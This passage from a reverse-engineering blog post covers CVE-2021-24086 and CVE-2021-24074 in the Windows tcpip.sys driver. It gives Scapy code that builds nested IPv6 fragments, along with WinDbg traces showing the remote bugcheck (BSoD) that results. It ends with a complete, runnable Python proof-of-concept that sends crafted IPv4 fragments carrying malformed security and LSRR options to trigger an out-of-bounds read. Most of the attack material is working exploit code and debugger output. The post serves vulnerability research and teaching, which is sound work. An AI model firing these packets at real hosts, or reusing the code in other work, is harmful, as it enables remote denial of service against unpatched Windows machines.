    ffff800f9ff5e940  61 61 61 61 61 61 61 61-61 61 61 61 61 61 61 61  aaaaaaaaaaaaaaaa
    ffff800f9ff5e950  61 61 61 61 61 61 61 61-61 61 61 61 61 61 61 61  aaaaaaaaaaaaaaaa
    ffff800f9ff5e960  61 61 61 61 61 61 61 61-61 61 61 61 61 61 61 61  aaaaaaaaaaaaaaaa

  ...

  MDL ffff800fa0937280
    ffff800fa09372c0  7a 69 7a 69 00 08 7e 7f                          zizi··~·

What we see above is the reassembled first fragment.

reassembled_pkt = IPv6ExtHdrDestOpt(options = [
        PadN(optdata=('a'*0xff)),
        PadN(optdata=('b'*0xff)),
        PadN(optdata=('c'*0xff)),
        PadN(optdata=('d'*0xff)),
        PadN(optdata=('e'*0xff)),
        PadN(optdata=('f'*0xff)),
        PadN(optdata=('0'*0xff)),
    ]) \
    # ...
    / IPv6ExtHdrDestOpt(options = [
        PadN(optdata=('a'*0xff)),
        PadN(optdata=('b'*0xa0)),
    ]) \
    / IPv6ExtHdrFragment(
        id = second_pkt_id, m = 1,
        nh = 17, offset = 0
    ) \
    / UDP(dport = 31337, sport = 31337, chksum=0x7e7f)

It is a fragment that is 10020 bytes long, and you can see that the ndiskd extension walks the long MDL chain that describes the content of this fragment. The last MDL is the header of the UDP part of the fragment. What is left to do is to trigger another reassembly. What if we send another fragment that is part of the same group; would this trigger another reassembly?

Well, let's see if the below works I guess:

reassembled_pkt_2 = Ether() \
    / IPv6(dst = args.target) \
    / IPv6ExtHdrFragment(id = second_pkt_id, m = 0, offset = 1, nh = 17) \
    / 'doar-e ftw'

sendp(reassembled_pkt_2, iface = args.iface)

Here is what we see in WinDbg:

kd> bp tcpip!Ipv6pReassembleDatagram

; This is the first reassembly; the output packet is the first large fragment

kd> g
Breakpoint 0 hit
tcpip!Ipv6pReassembleDatagram:
fffff805`4a5cdd6c 4488442418      mov     byte ptr [rsp+18h],r8b

; This is the second reassembly; it combines the first very large fragment, and the second fragment we just sent

kd> g
Breakpoint 0 hit
tcpip!Ipv6pReassembleDatagram:
fffff805`4a5cdd6c 4488442418      mov     byte ptr [rsp+18h],r8b

...

; Let's see the bug happen live!

kd> 
tcpip!Ipv6pReassembleDatagram+0xce:
fffff805`4a5cde3a 0fb79424a8000000 movzx   edx,word ptr [rsp+0A8h]

kd> 
tcpip!Ipv6pReassembleDatagram+0xd6:
fffff805`4a5cde42 498bce          mov     rcx,r14

kd> 
tcpip!Ipv6pReassembleDatagram+0xd9:
fffff805`4a5cde45 e80a35ecff      call    tcpip!NetioRetreatNetBuffer (fffff805`4a491354)

kd> r @edx
edx=10 <- truncated size

// ...

kd> 
tcpip!Ipv6pReassembleDatagram+0xe6:
fffff805`4a5cde52 8b9424a8000000  mov     edx,dword ptr [rsp+0A8h]

kd> 
tcpip!Ipv6pReassembleDatagram+0xed:
fffff805`4a5cde59 41b901000000    mov     r9d,1

kd> 
tcpip!Ipv6pReassembleDatagram+0xf3:
fffff805`4a5cde5f 8364242000      and     dword ptr [rsp+20h],0

kd> 
tcpip!Ipv6pReassembleDatagram+0xf8:
fffff805`4a5cde64 4533c0          xor     r8d,r8d

kd> 
tcpip!Ipv6pReassembleDatagram+0xfb:
fffff805`4a5cde67 498bce          mov     rcx,r14

kd> 
tcpip!Ipv6pReassembleDatagram+0xfe:
fffff805`4a5cde6a 48ff1507630700  call    qword ptr [tcpip!_imp_NdisGetDataBuffer (fffff805`4a644178)]

kd> r @rdx
rdx=0000000000010010 <- non truncated size

kd> p
tcpip!Ipv6pReassembleDatagram+0x105:
fffff805`4a5cde71 0f1f440000      nop     dword ptr [rax+rax]

kd> r @rax
rax=0000000000000000 <- NdisGetDataBuffer returned NULL!!!

kd> g
KDTARGET: Refreshing KD connection

*** Fatal System Error: 0x000000d1
                       (0x0000000000000000,0x0000000000000002,0x0000000000000001,0xFFFFF8054A5CDEBB)

Break instruction exception - code 80000003 (first chance)

A fatal system error has occurred.
Debugger entered on first try; Bugcheck callbacks have not been invoked.

A fatal system error has occurred.

nt!DbgBreakPointWithStatus:
fffff805`473c46a0 cc              int     3

kd> kc
 # Call Site
00 nt!DbgBreakPointWithStatus
01 nt!KiBugCheckDebugBreak
02 nt!KeBugCheck2
03 nt!KeBugCheckEx
04 nt!KiBugCheckDispatch
05 nt!KiPageFault
06 tcpip!Ipv6pReassembleDatagram
07 tcpip!Ipv6pReceiveFragment
08 tcpip!Ipv6pReceiveFragmentList
09 tcpip!IppReceiveHeaderBatch
0a tcpip!IppFlcReceivePacketsCore
0b tcpip!IpFlcReceivePackets
0c tcpip!FlpReceiveNonPreValidatedNetBufferListChain
0d tcpip!FlReceiveNetBufferListChainCalloutRoutine
0e nt!KeExpandKernelStackAndCalloutInternal
0f nt!KeExpandKernelStackAndCalloutEx
10 tcpip!FlReceiveNetBufferListChain
11 NDIS!ndisMIndicateNetBufferListsToOpen
12 NDIS!ndisMTopReceiveNetBufferLists
13 NDIS!ndisCallReceiveHandler
14 NDIS!ndisInvokeNextReceiveHandler
15 NDIS!NdisMIndicateReceiveNetBufferLists
16 netvsc!ReceivePacketMessage
17 netvsc!NvscKmclProcessPacket
18 nt!KiInitializeKernel
19 nt!KiSystemStartup

Incredible! We managed to implement the recursive fragmentation idea we discussed. Wow, I really didn't think it would actually work. Morale of the day: don't leave any rocks unturned, follow your intuitions and reach the state of no unknowns.

trigger

Conclusion

In this post I tried to take you with me through my journey to write a PoC for CVE-2021-24086, a true remote DoS vulnerability affecting Windows' tcpip.sys driver found by Microsoft own's @piazzt. From zero to remote BSoD. The PoC is available on my github here: 0vercl0k/CVE-2021-24086.

It was a wild ride mainly because it all looked way too easy and because I ended up chasing a bunch of ghosts.

I am sure that I've lost about 99% of my readers as it is a fairly long and hairy post, but if you made it all the way there you should join and come hang in the newly created Diary of a reverse-engineer Discord: https://discord.gg/4JBWKDNyYs. We're trying to build a community of people enjoying low level subjects. Hopefully we can also generate more interest for external contributions :)

Last but not least, special greets to the usual suspects: @yrp604 and @__x86 and @jonathansalwan for proof-reading this article.

Bonus: CVE-2021-24074

Here is the Poc I built based on the high quality blogpost put out by Armis:

# Axel '0vercl0k' Souchet - April 4 2021
# Extremely detailed root-cause analysis was made by Armis:
# https://www.armis.com/resources/iot-security-blog/from-urgent-11-to-frag-44-microsoft-patches-critical-vulnerabilities-in-windows-tcp-ip-stack/
from scapy.all import *
import argparse
import codecs
import random

def trigger(args):
    '''
    kd> g
    oob?
    tcpip!Ipv4pReceiveRoutingHeader+0x16a:
    fffff804`453c6f7a 4d8d2c1c        lea     r13,[r12+rbx]
    kd> p
    tcpip!Ipv4pReceiveRoutingHeader+0x16e:
    fffff804`453c6f7e 498bd5          mov     rdx,r13
    kd> db @r13
    ffffb90e`85b78220  c0 82 b7 85 0e b9 ff ff-38 00 04 10 00 00 00 00  ........8.......
    kd> dqs @r13 l1
    ffffb90e`85b78220  ffffb90e`85b782c0
    kd> p
    tcpip!Ipv4pReceiveRoutingHeader+0x171:
    fffff804`453c6f81 488d0d58830500  lea     rcx,[tcpip!Ipv4Global (fffff804`4541f2e0)]
    kd>
    tcpip!Ipv4pReceiveRoutingHeader+0x178:
    fffff804`453c6f88 e8d7e1feff      call    tcpip!IppIsInvalidSourceAddressStrict (fffff804`453b5164)
    kd> db @rdx
    kd> p
    tcpip!Ipv4pReceiveRoutingHeader+0x17d:
    fffff804`453c6f8d 84c0            test    al,al
    kd> r.
    al=00000000`00000000  al=00000000`00000000
    kd> p
    tcpip!Ipv4pReceiveRoutingHeader+0x17f:
    fffff804`453c6f8f 0f85de040000    jne     tcpip!Ipv4pReceiveRoutingHeader+0x663 (fffff804`453c7473)
    kd>
    tcpip!Ipv4pReceiveRoutingHeader+0x185:
    fffff804`453c6f95 498bcd          mov     rcx,r13
    kd>
    Breakpoint 3 hit
    tcpip!Ipv4pReceiveRoutingHeader+0x188:
    fffff804`453c6f98 e8e7dff8ff      call    tcpip!Ipv4UnicastAddressScope (fffff804`45354f84)
    kd> dqs @rcx l1
    ffffb90e`85b78220  ffffb90e`85b782c0

    Call-stack (skip first hit):
      kd> kc
      # Call Site
      00 tcpip!Ipv4pReceiveRoutingHeader
      01 tcpip!IppReceiveHeaderBatch
      02 tcpip!Ipv4pReassembleDatagram
      03 tcpip!Ipv4pReceiveFragment
      04 tcpip!Ipv4pReceiveFragmentList
      05 tcpip!IppReceiveHeaderBatch
      06 tcpip!IppFlcReceivePacketsCore
      07 tcpip!IpFlcReceivePackets
      08 tcpip!FlpReceiveNonPreValidatedNetBufferListChain
      09 tcpip!FlReceiveNetBufferListChainCalloutRoutine
      0a nt!KeExpandKernelStackAndCalloutInternal
      0b nt!KeExpandKernelStackAndCalloutEx
      0c tcpip!FlReceiveNetBufferListChain

    Snippet:
      __int16 __fastcall Ipv4pReceiveRoutingHeader(Packet_t *Packet)
      {
        // ...
        // kd> db @rax
        // ffffdc07`ff209170  ff ff 04 00 61 62 63 00-54 24 30 48 89 14 01 48  ....abc.T$0H...H
        RoutingHeaderFirst = NdisGetDataBuffer(FirstNetBuffer, Packet->RoutingHeaderOptionLength, &v50[0].qw2, 1u, 0);
        NetioAdvanceNetBufferList(NetBufferList, v8);
        OptionLenFirst = RoutingHeaderFirst[1];
        LenghtOptionFirstMinusOne = (unsigned int)(unsigned __int8)RoutingHeaderFirst[2] - 1;
        RoutingOptionOffset = LOBYTE(Packet->RoutingOptionOffset);
        if (OptionLenFirst < 7u ||
          LenghtOptionFirstMinusOne > OptionLenFirst - sizeof(IN_ADDR))
        {
          // ...
          goto Bail_0;
        }
        // ...
    '''
    id = random.randint(0, 0xff)
    # dst_ip isn't a broadcast IP because otherwise we fail a check in
    # Ipv4pReceiveRoutingHeader; if we don't take the below branch
    # we don't hit the interesting bits later:
    #   if (Packet->CurrentDestinationType == NlatUnicast) {
    #     v12 = &RoutingHeaderFirst[LenghtOptionFirstMinusOne];
    dst_ip = '192.168.2.137'
    src_ip = '120.120.120.0'
    # UDP
    nh = 17
    content = bytes(UDP(sport = 31337, dport = 31338) / '1')
    one = Ether() \
        / IP(
            src = src_ip,
            dst = dst_ip,
            flags = 1,
            proto = nh,
            frag = 0,
            id = id,
            options = [IPOption_Security(
                length = 0xb,
                security = 0x11,
                # This is used for as an ~upper bound in Ipv4pReceiveRoutingHeader:
                compartment = 0xffff,
                # This is the offset that allows us to index out of the
                # bounds of the second fragment.
                # Keep in mind that, the out of bounds data is first used
                # before triggering any corruption (in Ipv4pReceiveRoutingHeader):
                #  - IppIsInvalidSourceAddressStrict,
                #  - Ipv4UnicastAddressScope.
                # if (IppIsInvalidSourceAddressStrict(Ipv4Global, &RoutingHeaderFirst[LenghtOptionFirstMinusOne])
                #     || (Ipv4UnicastAddressScope(&RoutingHeaderFirst[LenghtOptionFirstMinusOne]),
                #         v13 = Ipv4UnicastAddressScope(&Packet->RoutingOptionSourceIp),
                #         v14 < v13) )
                # The upper byte of handling_restrictions is `RoutingHeaderFirst[2]` in the above snippet
                # Offset of 6 allows us to have &RoutingHeaderFirst[LenghtOptionFirstMinusOne] pointing on
                # one.IP.options.transmission_control_code; last byte is OOB.
                #   kd>
                #   tcpip!Ipv4pReceiveRoutingHeader+0x178:
                #   fffff804`5c076f88 e8d7e1feff      call    tcpip!IppIsInvalidSourceAddressStrict (fffff804`5c065164)
                #   kd> db @rdx
                #   ffffdc07`ff209175  62 63 00 54 24 30 48 89-14 01 48 c0 92 20 ff 07  bc.T$0H...H.. ..
                #                                ^
                #                                |_ oob
                handling_restrictions = (6 << 8),
                transmission_control_code = b'\x11\xc1\xa8'
            )]
        ) / content[: 8]
    two = Ether() \
        / IP(
            src = src_ip,
            dst = dst_ip,
            flags = 0,
            proto = nh,
            frag = 1,
            id = id,
            options = [
                IPOption_NOP(),
                IPOption_NOP(),
                IPOption_NOP(),
                IPOption_NOP(),
                IPOption_LSRR(
                    pointer = 0x8,
                    routers = ['11.22.33.44']
                ),
            ]
        ) / content[8: ]

    sendp([one, two], iface='eth1')

def main():
    parser = argparse.ArgumentParser()
    parser.add_argument('--target', default = 'ff02::1')
    parser.add_argument('--dport', default = 500)
    args = parser.parse_args()
    trigger(args)
    return

if __name__ == '__main__':
    main()
❌